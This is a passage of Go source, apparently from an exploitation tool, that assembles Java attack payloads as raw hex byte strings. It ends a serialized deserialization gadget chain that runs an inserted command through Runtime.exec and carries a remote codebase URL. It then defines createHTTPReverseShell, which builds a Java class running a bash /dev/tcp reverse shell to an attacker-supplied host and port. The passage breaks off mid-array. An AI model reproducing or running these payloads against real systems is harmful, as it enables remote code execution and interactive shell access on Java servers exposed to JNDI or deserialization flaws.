		"\x61\x72\x61\x74\x6f\x72\x73\x2e\x43\x6f\x6d\x70\x61\x72\x61\x62" +
		"\x6c\x65\x43\x6f\x6d\x70\x61\x72\x61\x74\x6f\x72\xfb\xf4\x99\x25" +
		"\xb8\x6e\xb1\x37\x02\x00\x00\x78\x70\x74\x00\x10\x6f\x75\x74\x70" +
		"\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x77\x04\x00\x00" +
		"\x00\x03\x73\x72\x00\x3a\x63\x6f\x6d\x2e\x73\x75\x6e\x2e\x6f\x72" +
		"\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x78\x61\x6c\x61\x6e\x2e\x69" +
		"\x6e\x74\x65\x72\x6e\x61\x6c\x2e\x78\x73\x6c\x74\x63\x2e\x74\x72" +
		"\x61\x78\x2e\x54\x65\x6d\x70\x6c\x61\x74\x65\x73\x49\x6d\x70\x6c" +
		"\x09\x57\x4f\xc1\x6e\xac\xab\x33\x03\x00\x06\x49\x00\x0d\x5f\x69" +
		"\x6e\x64\x65\x6e\x74\x4e\x75\x6d\x62\x65\x72\x49\x00\x0e\x5f\x74" +
		"\x72\x61\x6e\x73\x6c\x65\x74\x49\x6e\x64\x65\x78\x5b\x00\x0a\x5f" +
		"\x62\x79\x74\x65\x63\x6f\x64\x65\x73\x74\x00\x03\x5b\x5b\x42\x5b" +
		"\x00\x06\x5f\x63\x6c\x61\x73\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76" +
		"\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x4c\x00\x05" +
		"\x5f\x6e\x61\x6d\x65\x71\x00\x7e\x00\x04\x4c\x00\x11\x5f\x6f\x75" +
		"\x74\x70\x75\x74\x50\x72\x6f\x70\x65\x72\x74\x69\x65\x73\x74\x00" +
		"\x16\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x50\x72\x6f\x70" +
		"\x65\x72\x74\x69\x65\x73\x3b\x78\x70\x00\x00\x00\x00\xff\xff\xff" +
		"\xff\x75\x72\x00\x03\x5b\x5b\x42\x4b\xfd\x19\x15\x67\x67\xdb\x37" +
		"\x02\x00\x00\x78\x70\x00\x00\x00\x02\x75\x72\x00\x02\x5b\x42\xac" +
		"\xf3\x17\xf8\x06\x08\x54\xe0\x02\x00\x00\x78\x70\x00\x00\x07\x64" +
		"\xca\xfe\xba\xbe\x00\x00\x00\x34\x00\x39\x0a\x00\x03\x00\x22\x07" +
		"\x00\x37\x07\x00\x25\x07\x00\x26\x01\x00\x10\x73\x65\x72\x69\x61" +
		"\x6c\x56\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01" +
		"\x00\x0d\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05" +
		"\xad\x20\x93\xf3\x91\xdd\xef\x3e\x01\x00\x06\x3c\x69\x6e\x69\x74" +
		"\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00" +
		"\x0f\x4c\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65" +
		"\x01\x00\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65" +
		"\x54\x61\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x13\x53" +
		"\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65\x74\x50\x61\x79\x6c\x6f" +
		"\x61\x64\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65" +
		"\x73\x01\x00\x35\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70" +
		"\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64" +
		"\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c\x65" +
		"\x74\x50\x61\x79\x6c\x6f\x61\x64\x3b\x01\x00\x09\x74\x72\x61\x6e" +
		"\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c\x63\x6f\x6d\x2f\x73\x75" +
		"\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c" +
		"\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74" +
		"\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f" +
		"\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69" +
		"\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a" +
		"\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e" +
		"\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00\x08\x64\x6f\x63" +
		"\x75\x6d\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d\x2f\x73\x75\x6e" +
		"\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61" +
		"\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63" +
		"\x2f\x44\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64\x6c\x65\x72\x73" +
		"\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67" +
		"\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65" +
		"\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f" +
		"\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e" +
		"\x64\x6c\x65\x72\x3b\x01\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f" +
		"\x6e\x73\x07\x00\x27\x01\x00\xa6\x28\x4c\x63\x6f\x6d\x2f\x73\x75" +
		"\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c" +
		"\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74" +
		"\x63\x2f\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f" +
		"\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e" +
		"\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78" +
		"\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c\x63\x6f\x6d\x2f" +
		"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78" +
		"\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69" +
		"\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61" +
		"\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01\x00" +
		"\x08\x69\x74\x65\x72\x61\x74\x6f\x72\x01\x00\x35\x4c\x63\x6f\x6d" +
		"\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f" +
		"\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d" +
		"\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72" +
		"\x3b\x01\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01\x00\x41\x4c\x63" +
		"\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68" +
		"\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73" +
		"\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c" +
		"\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01" +
		"\x00\x0a\x53\x6f\x75\x72\x63\x65\x46\x69\x6c\x65\x01\x00\x0c\x47" +
		"\x61\x64\x67\x65\x74\x73\x2e\x6a\x61\x76\x61\x0c\x00\x0a\x00\x0b" +
		"\x07\x00\x28\x01\x00\x33\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f" +
		"\x70\x61\x79\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61" +
		"\x64\x67\x65\x74\x73\x24\x53\x74\x75\x62\x54\x72\x61\x6e\x73\x6c" +
		"\x65\x74\x50\x61\x79\x6c\x6f\x61\x64\x01\x00\x40\x63\x6f\x6d\x2f" +
		"\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78" +
		"\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73" +
		"\x6c\x74\x63\x2f\x72\x75\x6e\x74\x69\x6d\x65\x2f\x41\x62\x73\x74" +
		"\x72\x61\x63\x74\x54\x72\x61\x6e\x73\x6c\x65\x74\x01\x00\x14\x6a" +
		"\x61\x76\x61\x2f\x69\x6f\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61" +
		"\x62\x6c\x65\x01\x00\x39\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72" +
		"\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69" +
		"\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x54\x72" +
		"\x61\x6e\x73\x6c\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x01" +
		"\x00\x1f\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c" +
		"\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74" +
		"\x73\x01\x00\x08\x3c\x63\x6c\x69\x6e\x69\x74\x3e\x01\x00\x11\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65" +
		"\x07\x00\x2a\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65" +
		"\x01\x00\x15\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" +
		"\x52\x75\x6e\x74\x69\x6d\x65\x3b\x0c\x00\x2c\x00\x2d\x0a\x00\x2b" +
		"\x00\x2e\x01\x00\xd0" +
		encodedCommand +
		"\x08\x00\x30\x01\x00\x04\x65\x78\x65\x63\x01" +
		"\x00\x27\x28\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74" +
		"\x72\x69\x6e\x67\x3b\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" +
		"\x2f\x50\x72\x6f\x63\x65\x73\x73\x3b\x0c\x00\x32\x00\x33\x0a\x00" +
		"\x2b\x00\x34\x01\x00\x0d\x53\x74\x61\x63\x6b\x4d\x61\x70\x54\x61" +
		"\x62\x6c\x65\x01\x00\x1d\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f" +
		"\x50\x77\x6e\x65\x72\x32\x38\x34\x37\x34\x35\x38\x35\x37\x35\x34" +
		"\x35\x36\x33\x01\x00\x1f\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c" +
		"\x2f\x50\x77\x6e\x65\x72\x32\x38\x34\x37\x34\x35\x38\x35\x37\x35" +
		"\x34\x35\x36\x33\x3b\x00\x21\x00\x02\x00\x03\x00\x01\x00\x04\x00" +
		"\x01\x00\x1a\x00\x05\x00\x06\x00\x01\x00\x07\x00\x00\x00\x02\x00" +
		"\x08\x00\x04\x00\x01\x00\x0a\x00\x0b\x00\x01\x00\x0c\x00\x00\x00" +
		"\x2f\x00\x01\x00\x01\x00\x00\x00\x05\x2a\xb7\x00\x01\xb1\x00\x00" +
		"\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x31\x00\x0e" +
		"\x00\x00\x00\x0c\x00\x01\x00\x00\x00\x05\x00\x0f\x00\x38\x00\x00" +
		"\x00\x01\x00\x13\x00\x14\x00\x02\x00\x0c\x00\x00\x00\x3f\x00\x00" +
		"\x00\x03\x00\x00\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00" +
		"\x06\x00\x01\x00\x00\x00\x35\x00\x0e\x00\x00\x00\x20\x00\x03\x00" +
		"\x00\x00\x01\x00\x0f\x00\x38\x00\x00\x00\x00\x00\x01\x00\x15\x00" +
		"\x16\x00\x01\x00\x00\x00\x01\x00\x17\x00\x18\x00\x02\x00\x19\x00" +
		"\x00\x00\x04\x00\x01\x00\x1a\x00\x01\x00\x13\x00\x1b\x00\x02\x00" +
		"\x0c\x00\x00\x00\x49\x00\x00\x00\x04\x00\x00\x00\x01\xb1\x00\x00" +
		"\x00\x02\x00\x0d\x00\x00\x00\x06\x00\x01\x00\x00\x00\x38\x00\x0e" +
		"\x00\x00\x00\x2a\x00\x04\x00\x00\x00\x01\x00\x0f\x00\x38\x00\x00" +
		"\x00\x00\x00\x01\x00\x15\x00\x16\x00\x01\x00\x00\x00\x01\x00\x1c" +
		"\x00\x1d\x00\x02\x00\x00\x00\x01\x00\x1e\x00\x1f\x00\x03\x00\x19" +
		"\x00\x00\x00\x04\x00\x01\x00\x1a\x00\x08\x00\x29\x00\x0b\x00\x01" +
		"\x00\x0c\x00\x00\x00\x24\x00\x03\x00\x02\x00\x00\x00\x0f\xa7\x00" +
		"\x03\x01\x4c\xb8\x00\x2f\x12\x31\xb6\x00\x35\x57\xb1\x00\x00\x00" +
		"\x01\x00\x36\x00\x00\x00\x03\x00\x01\x03\x00\x02\x00\x20\x00\x00" +
		"\x00\x02\x00\x21\x00\x11\x00\x00\x00\x0a\x00\x01\x00\x02\x00\x23" +
		"\x00\x10\x00\x09\x75\x71\x00\x7e\x00\x10\x00\x00\x01\xd4\xca\xfe" +
		"\xba\xbe\x00\x00\x00\x34\x00\x1b\x0a\x00\x03\x00\x15\x07\x00\x17" +
		"\x07\x00\x18\x07\x00\x19\x01\x00\x10\x73\x65\x72\x69\x61\x6c\x56" +
		"\x65\x72\x73\x69\x6f\x6e\x55\x49\x44\x01\x00\x01\x4a\x01\x00\x0d" +
		"\x43\x6f\x6e\x73\x74\x61\x6e\x74\x56\x61\x6c\x75\x65\x05\x71\xe6" +
		"\x69\xee\x3c\x6d\x47\x18\x01\x00\x06\x3c\x69\x6e\x69\x74\x3e\x01" +
		"\x00\x03\x28\x29\x56\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0f\x4c" +
		"\x69\x6e\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00" +
		"\x12\x4c\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61" +
		"\x62\x6c\x65\x01\x00\x04\x74\x68\x69\x73\x01\x00\x03\x46\x6f\x6f" +
		"\x01\x00\x0c\x49\x6e\x6e\x65\x72\x43\x6c\x61\x73\x73\x65\x73\x01" +
		"\x00\x25\x4c\x79\x73\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79" +
		"\x6c\x6f\x61\x64\x73\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65" +
		"\x74\x73\x24\x46\x6f\x6f\x3b\x01\x00\x0a\x53\x6f\x75\x72\x63\x65" +
		"\x46\x69\x6c\x65\x01\x00\x0c\x47\x61\x64\x67\x65\x74\x73\x2e\x6a" +
		"\x61\x76\x61\x0c\x00\x0a\x00\x0b\x07\x00\x1a\x01\x00\x23\x79\x73" +
		"\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73" +
		"\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x24\x46\x6f" +
		"\x6f\x01\x00\x10\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62" +
		"\x6a\x65\x63\x74\x01\x00\x14\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x53" +
		"\x65\x72\x69\x61\x6c\x69\x7a\x61\x62\x6c\x65\x01\x00\x1f\x79\x73" +
		"\x6f\x73\x65\x72\x69\x61\x6c\x2f\x70\x61\x79\x6c\x6f\x61\x64\x73" +
		"\x2f\x75\x74\x69\x6c\x2f\x47\x61\x64\x67\x65\x74\x73\x00\x21\x00" +
		"\x02\x00\x03\x00\x01\x00\x04\x00\x01\x00\x1a\x00\x05\x00\x06\x00" +
		"\x01\x00\x07\x00\x00\x00\x02\x00\x08\x00\x01\x00\x01\x00\x0a\x00" +
		"\x0b\x00\x01\x00\x0c\x00\x00\x00\x2f\x00\x01\x00\x01\x00\x00\x00" +
		"\x05\x2a\xb7\x00\x01\xb1\x00\x00\x00\x02\x00\x0d\x00\x00\x00\x06" +
		"\x00\x01\x00\x00\x00\x3c\x00\x0e\x00\x00\x00\x0c\x00\x01\x00\x00" +
		"\x00\x05\x00\x0f\x00\x12\x00\x00\x00\x02\x00\x13\x00\x00\x00\x02" +
		"\x00\x14\x00\x11\x00\x00\x00\x0a\x00\x01\x00\x02\x00\x16\x00\x10" +
		"\x00\x09\x70\x74\x00\x04\x50\x77\x6e\x72\x70\x77\x01\x00\x78\x71" +
		"\x00\x7e\x00\x0d\x78\x30\x2b\x04\x0c\x6a\x61\x76\x61\x43\x6f\x64" +
		"\x65\x42\x61\x73\x65\x31\x1b\x04\x19\x68\x74\x74\x70\x3a\x2f\x2f" +
		"\x31\x30\x2e\x31\x32\x2e\x37\x30\x2e\x32\x35\x32\x3a\x38\x31\x38" +
		"\x30\x2f\x30\x16\x04\x0d\x6a\x61\x76\x61\x43\x6c\x61\x73\x73\x4e" +
		"\x61\x6d\x65\x31\x05\x04\x03\x66\x6f\x6f"

	return complete
}

// this is *exactly* https://github.com/zzwlpx/JNDIExploit/blob/master/src/main/java/com/feihong/ldap/template/ReverseShellTemplate.java
func createHTTPReverseShell(lhost string, lport int, classname string) string {
	command := "/bin/bash -i >&  /dev/tcp/" + lhost + "/" + strconv.Itoa(lport) + " 0>&1"

	classLength := make([]byte, 2)
	binary.BigEndian.PutUint16(classLength, uint16(len(classname)))

	commandLength := make([]byte, 2)
	binary.BigEndian.PutUint16(commandLength, uint16(len(command)))

	//nolint:dupword // Duplicate words () found
	complete := "\xca\xfe\xba\xbe\x00\x00\x00\x32\x00\x48\x01" +
		string(classLength) + classname +
		"\x07\x00" +
		"\x01\x01\x00\x40\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f" +
		"\x61\x70\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74" +
		"\x65\x72\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x72\x75\x6e\x74" +
		"\x69\x6d\x65\x2f\x41\x62\x73\x74\x72\x61\x63\x74\x54\x72\x61\x6e" +
		"\x73\x6c\x65\x74\x07\x00\x03\x01\x00\x02\x69\x70\x01\x00\x12\x4c" +
		"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" +
		"\x3b\x01\x00\x04\x70\x6f\x72\x74\x01\x00\x01\x49\x01\x00\x06\x3c" +
		"\x69\x6e\x69\x74\x3e\x01\x00\x03\x28\x29\x56\x01\x00\x13\x6a\x61" +
		"\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f" +
		"\x6e\x07\x00\x0b\x0c\x00\x09\x00\x0a\x0a\x00\x04\x00\x0d\x01\x00" +
		"\x0c\x6a\x61\x76\x61\x2f\x69\x6f\x2f\x46\x69\x6c\x65\x07\x00\x0f" +
		"\x01\x00\x09\x73\x65\x70\x61\x72\x61\x74\x6f\x72\x0c\x00\x11\x00" +
		"\x06\x09\x00\x10\x00\x12\x01\x00\x01\x2f\x08\x00\x14\x01\x00\x10" +
		"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" +
		"\x07\x00\x16\x01\x00\x06\x65\x71\x75\x61\x6c\x73\x01\x00\x15\x28" +
		"\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63" +
		"\x74\x3b\x29\x5a\x0c\x00\x18\x00\x19\x0a\x00\x17\x00\x1a\x01\x00" +
		"\x09\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x08\x00\x1c\x01\x00\x02" +
		"\x2d\x63\x08\x00\x1e\x01" + string(commandLength) + command +
		"\x08\x00\x20\x01\x00\x11\x6a\x61\x76\x61" +
		"\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e\x74\x69\x6d\x65\x07\x00\x22" +
		"\x01\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x01\x00\x15" +
		"\x28\x29\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x52\x75\x6e" +
		"\x74\x69\x6d\x65\x3b\x0c\x00\x24\x00\x25\x0a\x00\x23\x00\x26\x01" +
		"\x00\x04\x65\x78\x65\x63\x01\x00\x28\x28\x5b\x4c\x6a\x61\x76\x61" +
		"\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x29\x4c\x6a" +
		"\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x50\x72\x6f\x63\x65\x73\x73" +
		"\x3b\x0c\x00\x28\x00\x29\x0a\x00\x23\x00\x2a\x01\x00\x13\x5b\x4c" +
		"\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67" +
		"\x3b\x07\x00\x2c\x01\x00\x0f\x70\x72\x69\x6e\x74\x53\x74\x61\x63" +
		"\x6b\x54\x72\x61\x63\x65\x0c\x00\x2e\x00\x0a\x0a\x00\x0c\x00\x2f" +
		"\x01\x00\x01\x65\x01\x00\x15\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e" +
		"\x67\x2f\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3b\x01\x00\x07\x63" +
		"\x6f\x6d\x6d\x61\x6e\x64\x01\x00\x04\x74\x68\x69\x73\x01\x00\x0e" +
		"\x4c\x52\x65\x76\x65\x72\x73\x65\x53\x68\x65\x6c\x6c\x3b\x01\x00" +
		"\x09\x74\x72\x61\x6e\x73\x66\x6f\x72\x6d\x01\x00\x72\x28\x4c\x63" +
		"\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68" +
		"\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c" +
		"\x2f\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x5b\x4c\x63\x6f\x6d" +
		"\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f" +
		"\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72" +
		"\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a" +
		"\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x29\x56\x01" +
		"\x00\x39\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70" +
		"\x61\x63\x68\x65\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72" +
		"\x6e\x61\x6c\x2f\x78\x73\x6c\x74\x63\x2f\x54\x72\x61\x6e\x73\x6c" +
		"\x65\x74\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x07\x00\x38\x01\x00" +
		"\x08\x64\x6f\x63\x75\x6d\x65\x6e\x74\x01\x00\x2d\x4c\x63\x6f\x6d" +
		"\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f" +
		"\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x78" +
		"\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x01\x00\x08\x68\x61\x6e\x64" +
		"\x6c\x65\x72\x73\x01\x00\x42\x5b\x4c\x63\x6f\x6d\x2f\x73\x75\x6e" +
		"\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f" +
		"\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69" +
		"\x7a\x65\x72\x2f\x53\x65\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f" +
		"\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x01\x00\xa6\x28\x4c\x63\x6f" +
		"\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65" +
		"\x2f\x78\x61\x6c\x61\x6e\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f" +
		"\x78\x73\x6c\x74\x63\x2f\x44\x4f\x4d\x3b\x4c\x63\x6f\x6d\x2f\x73" +
		"\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x78\x6d" +
		"\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f\x64\x74\x6d\x2f\x44" +
		"\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72\x61\x74\x6f\x72\x3b\x4c" +
		"\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61\x63" +
		"\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c\x2f" +
		"\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65\x72\x69\x61" +
		"\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b" +
		"\x29\x56\x01\x00\x08\x69\x74\x65\x72\x61\x74\x6f\x72\x01\x00\x35" +
		"\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61\x70\x61" +
		"\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e\x61\x6c" +
		"\x2f\x64\x74\x6d\x2f\x44\x54\x4d\x41\x78\x69\x73\x49\x74\x65\x72" +
		"\x61\x74\x6f\x72\x3b\x01\x00\x07\x68\x61\x6e\x64\x6c\x65\x72\x01" +
		"\x00\x41\x4c\x63\x6f\x6d\x2f\x73\x75\x6e\x2f\x6f\x72\x67\x2f\x61" +
		"\x70\x61\x63\x68\x65\x2f\x78\x6d\x6c\x2f\x69\x6e\x74\x65\x72\x6e" +
		"\x61\x6c\x2f\x73\x65\x72\x69\x61\x6c\x69\x7a\x65\x72\x2f\x53\x65" +
		"\x72\x69\x61\x6c\x69\x7a\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c" +
		"\x65\x72\x3b\x01\x00\x04\x43\x6f\x64\x65\x01\x00\x0d\x53\x74\x61" +
		"\x63\x6b\x4d\x61\x70\x54\x61\x62\x6c\x65\x01\x00\x0f\x4c\x69\x6e" +
		"\x65\x4e\x75\x6d\x62\x65\x72\x54\x61\x62\x6c\x65\x01\x00\x12\x4c" +
		"\x6f\x63\x61\x6c\x56\x61\x72\x69\x61\x62\x6c\x65\x54\x61\x62\x6c" +
		"\x65\x01\x00\x0a\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x73\x00\x21" +
		"\x00\x02\x00\x04\x00\x00\x00\x02\x00\x02\x00\x05\x00\x06\x00\x00" +
		"\x00\x02\x00\x07\x00\x08\x00\x00\x00\x03\x00\x01\x00\x09\x00\x0a" +
		"\x00\x01\x00\x43\x00\x00\x00\xb1\x00\x04\x00\x03\x00\x00\x00\x34" +
		"\x2a\xb7\x00\x0e\xb2\x00\x13\x12\x15\xb6\x00\x1b\x99\x00\x27\x06" +
		"\xbd\x00\x17\x59\x03\x12\x1d\x53\x59\x04\x12\x1f\x53\x59\x05\x12" +
		"\x21\x53\x4c\xb8\x00\x27\x2b\xb6\x00\x2b\x57\xa7\x00\x08\x4d\x2c" +
		"\xb6\x00\x30\xb1\x00\x01\x00\x23" +
		"\x00\x2b\x00\x2e\x00\x0c\x00\x03\x00\x44\x00\x00\x00\x15\x00\x02" +
		"\xff\x00\x2e\x00\x02\x07\x00\x02\x07\x00\x2d\x00\x01\x07\x00\x0c" +
		"\xfa\x00\x04\x00\x45\x00\x00\x00\x22\x00\x08\x00\x00\x00\x0c\x00" +
		"\x04\x00\x0d\x00\x0f\x00\x0e\x00\x23\x00\x10\x00\x2b\x00\x13\x00" +
		"\x2e\x00\x11\x00\x2f\x00\x12\x00\x33\x00\x16\x00\x46\x00\x00\x00" +
		"\x20\x00\x03\x00\x2f\x00\x04\x00\x31\x00\x32\x00\x02\x00\x23\x00" +
		"\x10\x00\x33\x00\x2c\x00\x01\x00\x00\x00\x34\x00\x34\x00\x35\x00" +
